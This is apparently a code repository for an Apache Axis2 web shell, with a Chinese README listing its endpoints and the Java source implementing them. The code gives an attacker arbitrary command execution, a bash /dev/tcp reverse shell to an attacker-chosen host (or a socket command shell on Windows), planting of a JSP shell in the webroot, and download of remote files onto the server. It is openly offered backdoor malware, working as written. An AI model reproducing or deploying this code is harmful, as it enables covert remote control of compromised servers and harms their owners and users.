├── README.md ├── Utils.java └── config.aar /README.md: -------------------------------------------------------------------------------- 1 | axis2 2 | ========= 3 | 4 | axis2 web shell 5 | 6 | 7 | 使用介绍: 8 | 9 | 1、命令执行 10 | http://1.1.1.1/services/config/exec?cmd=whoami 11 | (不说了,执行命令。注意:xml换行没有处理好) 12 | 13 | 2、反弹shell 14 | http://1.1.1.1/services/config/shell?host=1.1.1.1&port=5555 15 | (Linux则使用bash反弹shell,Windows则会进行socket执行shell) 16 | 17 | 18 | 3、文件上传 19 | http://1.1.1.1/services/config/upload?path=/opt/tomcat/webapps/ROOT/shell.jsp 20 | (会把resource目录下面的one.txt 写成shell.jsp,注意:全路径,带*文件名) 21 | 22 | 23 | 4、文件下载 24 | http://1.1.1.1/services/config/download?url=http://www.ooo.com/mm.txt&path=/opt/tomcat/webapps/ROOT/shell.jsp 25 | (会把这个URL的文件写成shell.jsp,注意:全路径,带*文件名) 26 | 27 | 28 | 5、class目录查看 29 | http://1.1.1.1/services/config/getClassPath 30 | (会显示当前class的路径,方便文件上传) 31 | 32 | 33 | -------------------------------------------------------------------------------- /Utils.java: -------------------------------------------------------------------------------- 1 | import java.io.BufferedReader; 2 | import java.io.File; 3 | import java.io.FileOutputStream; 4 | import java.io.FileWriter; 5 | import java.io.InputStream; 6 | import java.io.InputStreamReader; 7 | import java.io.OutputStream; 8 | import java.net.Socket; 9 | import java.net.URL; 10 | import java.net.URLConnection; 11 | 12 | public class Utils { 13 | 14 | static String os = System.getProperty("os.name").toLowerCase(); 15 | 16 | public static String exec(String cmd) { 17 | String result=""; 18 | try { 19 | if (cmd!=null&&cmd.trim().length()>0) { 20 | if (os.startsWith("windows")) { 21 | cmd="cmd.exe /c "+ cmd; 22 | }else { 23 | cmd="/bin/sh -c "+ cmd; 24 | } 25 | InputStream inputStream= Runtime.getRuntime().exec(cmd).getInputStream(); 26 | 27 | int read=0; 28 | while ((read=inputStream.read())!=-1) { 29 | result+=(char)read; 30 | } 31 | } 32 | } catch (Exception e) { 33 | result=e.getMessage(); 34 | } 35 | return result; 36 | } 37 | 38 | public static String shell(String host, int port) { 39 | 40 | String result = ""; 41 | if (host != null && host.trim().length() > 0 && port > 0) { 42 | try { 43 | if (os.startsWith("linux")) { 44 | 45 | String name="wooyun.sh"; 46 | File file=new File(name); 47 | 48 | FileWriter writer=new FileWriter(file); 49 | writer.write("/bin/bash -i > /dev/tcp/"+host+"/"+port+" 0<&1 2>&1"+"\n"); 50 | writer.flush(); 51 | writer.close(); 52 | Runtime.getRuntime().exec("chmod u+x "+name); 53 | Process process = Runtime.getRuntime().exec("bash "+name); 54 | process.waitFor(); 55 | 56 | file.delete(); 57 | } else { 58 | Socket socket = new Socket(host, port); 59 | OutputStream out = socket.getOutputStream(); 60 | InputStream in = socket.getInputStream(); 61 | out.write(("whoami:\t" + exec("whoami")).getBytes()); 62 | int a = 0; 63 | byte[] b = new byte[4096]; 64 | while ((a = in.read(b)) != -1) { 65 | out.write(exec(new String(b, 0, a, "UTF-8").trim()).getBytes("UTF-8")); 66 | } 67 | } 68 | } catch (Exception e) { 69 | result = e.getMessage(); 70 | } 71 | 72 | } else { 73 | result = "host and port are required"; 74 | } 75 | 76 | return result; 77 | } 78 | 79 | public static String upload(String path) { 80 | String result=""; 81 | try { 82 | if (path!=null&&path.trim().length()>0) { 83 | FileOutputStream fos=new FileOutputStream(new File(path)); 84 | InputStream inputStream =new Utils().getClass().getResourceAsStream("/resource/one.txt"); 85 | BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream)); 86 | String temp = ""; 87 | while (reader.ready()) { 88 | temp += reader.readLine() + "\n"; 89 | } 90 | fos.write(temp.getBytes()); 91 | fos.flush(); 92 | fos.close(); 93 | result="Upload Success"; 94 | }else { 95 | result="Path is required"; 96 | } 97 | } catch (Exception e) { 98 | result =e.getMessage(); 99 | } 100 | return result; 101 | } 102 | 103 | public static String download(String url, String path) { 104 | String result=""; 105 | try { 106 | 107 | if (url!=null&&url.trim().length()>0&&path!=null&&path.trim().length()>0) { 108 | URLConnection conn=new URL(url).openConnection(); 109 | conn.setReadTimeout(10*60*1000); 110 | conn.setReadTimeout(10*60*1000); 111 | InputStream inputStream=conn.getInputStream(); 112 | int read=0; 113 | FileOutputStream fos=new FileOutputStream(new File(path)); 114 | while ((read=inputStream.read())!=-1) { 115 | fos.write(read); 116 | } 117 | fos.flush(); 118 | fos.close(); 119 | }else { 120 | result="Url and path are required"; 121 | } 122 | } catch (Exception e) { 123 | result =e.getMessage(); 124 | } 125 | return result; 126 | } 127 | 128 | public static String getClassPath() { 129 | return new Utils().getClass().getClassLoader().getResource("/").getPath(); 130 | } 131 | 132 | } 133 | -------------------------------------------------------------------------------- /config.aar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Svti/Axis2Shell/39f6a4ddc0325038356acad46fd266ae928d4f48/config.aar --------------------------------------------------------------------------------